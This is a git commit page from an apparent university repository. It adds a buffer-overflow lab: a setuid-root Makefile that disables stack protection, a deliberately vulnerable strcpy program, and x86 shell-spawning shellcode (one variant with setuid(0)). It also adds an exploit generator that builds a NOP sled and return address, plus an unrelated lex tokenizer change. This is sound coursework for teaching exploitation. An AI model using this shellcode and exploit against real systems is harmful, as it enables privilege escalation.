uni

University stuff
git clone git://git.margiolis.net/uni.git
Log | Files | Refs | README | LICENSE
commit 37a769ca5b7668e3b593fddf42cdeeaca1512049
parent 079549ee79b6f72028fe6ff8fb11c5f0df1ad9d3
Author: Christos Margiolis <christos@margiolis.net>
Date:   Sat, 30 Apr 2022 17:41:37 +0300

ex2

Diffstat:

Ac_security/ex2/Makefile | 22++++++++++++++++++++++


Ac_security/ex2/dash_shellcode.c | 31+++++++++++++++++++++++++++++++


Ac_security/ex2/exploit.c | 42++++++++++++++++++++++++++++++++++++++++++


Ac_security/ex2/shellcode.c | 24++++++++++++++++++++++++


Ac_security/ex2/stack.c | 30++++++++++++++++++++++++++++++


Mlex_bison_compilers/part2/lex.l | 14+++++++-------


Alex_bison_compilers/part2/output.txt | 39+++++++++++++++++++++++++++++++++++++++


7 files changed, 195 insertions(+), 7 deletions(-)

diff --git a/c_security/ex2/Makefile b/c_security/ex2/Makefile
@@ -0,0 +1,22 @@
+TARGS = shellcode \
+	dash_shellcode \
+	stack \
+	exploit
+
+#SCRIPTS = 
+
+CC = cc
+CFLAGS = -std=c99 -pedantic -Wall -Os -Iinclude -g -z execstack \
+	 -fno-stack-protector
+LIBS = -Llib
+
+all:
+	for targ in ${TARGS} ; do \
+		${CC} $${targ}.c ${LIBS} -o $${targ} ; \
+		chown root $${targ} ; \
+		chmod 4755 $${targ} ; \
+	done
+	#chmod +x ${SCRIPTS}
+
+clean:
+	rm -f ${TARGS} bad *.o *.core
diff --git a/c_security/ex2/dash_shellcode.c b/c_security/ex2/dash_shellcode.c
@@ -0,0 +1,31 @@
+#include <string.h>
+
+static const char code[] =
+	/* setuid(0) */
+	"\x31\xc0"	/* xorl		%eax, %eax	*/
+	"\x31\xdb"	/* xorl		%ebx, %ebx	*/
+	"\xb0\xd5"	/* movb		$0xd5, %al	*/
+	"\xcd\x80"	/* int		$0x80		*/
+
+	/* same code as in shellcode.c */
+	"\x31\xc0"	/* xorl		%eax, %eax	*/
+	"\x50"		/* pushl	%eax		*/
+	"\x68""//sh"	/* pushl	addr		*/
+	"\x68""/bin"	/* pushl	addr		*/
+	"\x89\xe3"	/* movl		%esp, %ebx	*/
+	"\x50"		/* pushl	%eax		*/
+	"\x53"		/* pushl	%ebx		*/
+	"\x89\xe1"	/* movl		%esp, %ecx	*/
+	"\x99"		/* cdq				*/
+	"\xb0\x0b"	/* movb		$0x0b, %al	*/
+	"\xcd\x80"	/* int		$0x80		*/
+	;
+
+int
+main(int argc, char *argv[])
+{
+	void (*sc)() = (void *)code;
+	sc();
+
+	return (0);
+}
diff --git a/c_security/ex2/exploit.c b/c_security/ex2/exploit.c
@@ -0,0 +1,42 @@
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+static const char code[] =
+	"\x31\xc0"	/* xorl		%eax, %eax	*/
+	"\x50"		/* pushl	%eax		*/
+	"\x68""//sh"	/* pushl	addr		*/
+	"\x68""/bin"	/* pushl	addr		*/
+	"\x89\xe3"	/* movl		%esp, %ebx	*/
+	"\x50"		/* pushl	%eax		*/
+	"\x53"		/* pushl	%ebx		*/
+	"\x89\xe1"	/* movl		%esp, %ecx	*/
+	"\x99"		/* cdq				*/
+	"\xb0\x0b"	/* movb		$0x0b, %al	*/
+	"\xcd\x80"	/* int		$0x80		*/
+	;
+
+int
+main(int argc, char *argv[])
+{
+	FILE *badfp;
+	char buf[517];
+
+	/* fill with NOPs */
+	memset(&buf, 0x90, sizeof(buf));
+
+	/* place return address */
+	*((long *)(buf + 0x24)) = 0x7fffffffe670 + 0x60;
+
+	/* write shellcode at the end of buf */
+	memcpy(buf + sizeof(buf) - sizeof(code), code, sizeof(code));
+
+	/* save to badfp */
+	if ((badfp = fopen("bad", "w")) == NULL)
+		err(1, "fopen(bad)");
+	fwrite(buf, sizeof(buf), 1, badfp);
+	fclose(badfp);
+
+	return (0);
+}
diff --git a/c_security/ex2/shellcode.c b/c_security/ex2/shellcode.c
@@ -0,0 +1,24 @@
+#include <string.h>
+
+static const char code[] =
+	"\x31\xc0"	/* xorl		%eax, %eax	*/
+	"\x50"		/* pushl	%eax		*/
+	"\x68""//sh"	/* pushl	$0x68732f2f	*/
+	"\x68""/bin"	/* pushl	$0x6e69622f	*/
+	"\x89\xe3"	/* movl		%esp, %ebx	*/
+	"\x50"		/* pushl	%eax		*/
+	"\x53"		/* pushl	%ebx		*/
+	"\x89\xe1"	/* movl		%esp, %ecx	*/
+	"\x99"		/* cdq				*/
+	"\xb0\x0b"	/* movb		$0x0b, %al	*/
+	"\xcd\x80"	/* int		$0x80		*/
+	;
+
+int
+main(int argc, char *argv[])
+{
+	void (*sc)() = (void *)code;
+	sc();
+
+	return (0);
+}
diff --git a/c_security/ex2/stack.c b/c_security/ex2/stack.c
@@ -0,0 +1,30 @@
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int
+bof(char *str)
+{
+	char buf[24];
+
+	printf("addr: %p\n", buf);
+	strcpy(buf, str);
+	return (1);
+}
+
+int
+main(int argc, char *argv[])
+{
+	FILE *badfp;
+	char str[517];
+
+	if ((badfp = fopen("bad", "r")) == NULL)
+		err(1, "fopen(bad)");
+	fread(str, sizeof(char), 517, badfp);
+	fclose(badfp);
+	bof(str);
+	printf("returned\n");
+
+	return (0);
+}
diff --git a/lex_bison_compilers/part2/lex.l b/lex_bison_compilers/part2/lex.l
@@ -12,27 +12,27 @@ int lineno = 1;
 %}
 
 DELIM		[ \t]+
+KEYWORD		deffacts|defrule|test|bind|read|printout
+OPERATOR	=|\+|-|\*|\/
 INT		0|[+-]?[1-9]+[0-9]*
 FLOAT		[+-]?[0-9]+((\.[0-9]+)([eE][+-]?[0-9]*)?|([eE][+-]?[0-9]*)?)
 STR		\"[^\"\\]*(?:\\.[^\"\\]*)*\"
 DEFIN		[A-Za-z]+[A-Za-z0-9_-]*
 VAR		\?[A-Za-z0-9]+
 COMMENT		;.*
-KEYWORD		deffacts|defrule|test|bind|read|printout
-OPERATOR	=|\+|-|\*|\/
 UNKNOWN		[^ {DELIM}\n]+
-%%
 
+%%
 {DELIM}		{ /* ignore whitespace */ }
+{KEYWORD}	{ return TOK_KEYWORD; }
+{OPERATOR}	{ return TOK_OPERATOR; }
 {INT}		{ return TOK_INT; }
 {FLOAT}		{ return TOK_FLOAT; }
 {STR}		{ return TOK_STR; }
 {DEFIN}		{ return TOK_DEFIN; }
 {VAR}		{ return TOK_VAR; }
-{COMMENT}	{ /* skip comments */ }
-{KEYWORD}	{ return TOK_KEYWORD; }
-{OPERATOR}	{ return TOK_OPERATOR; }
 {UNKNOWN}	{ return TOK_UNKNOWN; }
+{COMMENT}	{ /* skip comments */ }
 \n		{ lineno++; }
 <<EOF>>		{ printf("EOF\n"); exit(0); }
 %%
@@ -63,7 +63,7 @@ main(int argc, char *argv[])
 		err(1, "fopen(%s)", argv[2]);
 
 	while ((tok = yylex()) >= 0) {
-		fprintf(yyout, "line: %d\ttoken=%s\tval='%s'\n",
+		fprintf(yyout, "line: %5d\ttoken=%s\tval='%s'\n",
 		    lineno, tokens[tok-1], yytext);
 	}
 
diff --git a/lex_bison_compilers/part2/output.txt b/lex_bison_compilers/part2/output.txt
@@ -0,0 +1,39 @@
+line:     1	token=INT	val='+1234'
+line:     2	token=INT	val='50'
+line:     3	token=INT	val='-115'
+line:     4	token=FLOAT	val='3.14'
+line:     5	token=FLOAT	val='-10.0'
+line:     6	token=FLOAT	val='+0.0001'
+line:     7	token=FLOAT	val='3.14e-10'
+line:     8	token=FLOAT	val='0e0'
+line:     9	token=DEFIN	val='static-facts'
+line:    10	token=DEFIN	val='MoveUp'
+line:    11	token=DEFIN	val='CUBES'
+line:    12	token=DEFIN	val='sum-1'
+line:    13	token=DEFIN	val='table'
+line:    14	token=DEFIN	val='pacman'
+line:    15	token=DEFIN	val='A-21-b'
+line:    16	token=VAR	val='?x'
+line:    17	token=VAR	val='?X'
+line:    18	token=VAR	val='?3'
+line:    19	token=VAR	val='?ad'
+line:    20	token=VAR	val='?X1b23'
+line:    21	token=VAR	val='?32AbC'
+line:    22	token=VAR	val='?ABcd1234de'
+line:    23	token=STR	val='""'
+line:    24	token=STR	val='"Test"'
+line:    25	token=STR	val='"Hello world"'
+line:    26	token=STR	val='"Mark said, \"Boo!\""'
+line:    28	token=DEFIN	val='ignore'
+line:    28	token=DEFIN	val='whitespace'
+line:    29	token=UNKNOWN	val='#unknown'
+line:    29	token=VAR	val='?2'
+line:    29	token=UNKNOWN	val='?'
+line:    29	token=VAR	val='?hello'
+line:    29	token=VAR	val='?world'
+line:    30	token=KEYWORD	val='deffacts'
+line:    30	token=KEYWORD	val='defrule'
+line:    30	token=KEYWORD	val='test'
+line:    31	token=INT	val='2'
+line:    31	token=OPERATOR	val='+'
+line:    31	token=INT	val='2'